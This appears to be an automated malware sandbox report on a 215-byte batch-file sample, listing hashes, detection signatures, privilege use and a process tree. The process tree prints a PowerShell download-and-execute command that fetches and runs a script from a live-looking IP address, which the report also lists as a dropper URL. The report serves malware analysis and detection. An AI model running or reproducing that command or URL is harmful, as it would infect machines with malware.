Analysis
max time kernel: 149s
max time network: 93s
platform: windows10_x64
resource: win10v200722
submitted: 04-08-2020 09:10
Static task: static1

Behavioral task: behavioral1
  Sample: c7537637f0d43130ee366e47192dafee.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: c7537637f0d43130ee366e47192dafee.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
Target: c7537637f0d43130ee366e47192dafee.bat
Size: 215B
MD5: fbd7beaf39f98a9eb0c56a0e772d389f
SHA1: 73f16802c6fa6a0c52971bc8d8a04eff13c47a84
SHA256: 7172e83cc79ad9bc4d5de2683b447c5d68bc807882c369dd2c0c9b04839189d7
SHA512: f45895fc63492fa4e179ca664a275a614c2326c04fa85e9438fa5d9095498bc916cba1ee44b47b8148607d974da6cf3821d6022aaa0eff886c445dd1b7ca82d5
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source URLs:
    ps1.dropper    http://185.103.242.78/pastes/c7537637f0d43130ee366e47192dafee
Signatures

ServiceHost packer (6 IoCs)
Detects ServiceHost packer used for .NET malware
Processes:
  resource                                                   yara_rule
  behavioral2/memory/908-2-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/908-3-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/908-5-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/908-4-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/908-6-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/908-7-0x0000000000000000-mapping.dmp    servicehost

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: cmd.exe
  description                         pid    process    target process
  PID 584 wrote to memory of 908      584    cmd.exe    powershell.exe
  PID 584 wrote to memory of 908      584    cmd.exe    powershell.exe
  PID 584 wrote to memory of 908      584    cmd.exe    powershell.exe

Program crash (1 IoCs)
Processes: WerFault.exe
  pid     pid_target    process         target process
  1128    908           WerFault.exe    powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: WerFault.exe
  description                 pid     process
  Token: SeRestorePrivilege   1128    WerFault.exe
  Token: SeBackupPrivilege    1128    WerFault.exe
  Token: SeDebugPrivilege     1128    WerFault.exe

Suspicious behavior: EnumeratesProcesses (13 IoCs)
Processes: WerFault.exe
  pid     process
  1128    WerFault.exe (13 occurrences)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c7537637f0d43130ee366e47192dafee.bat"
   PID: 584
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c7537637f0d43130ee366e47192dafee');Invoke-HBZVQZJA;Start-Sleep -s 10000"
      PID: 908

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 704
         PID: 1128
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses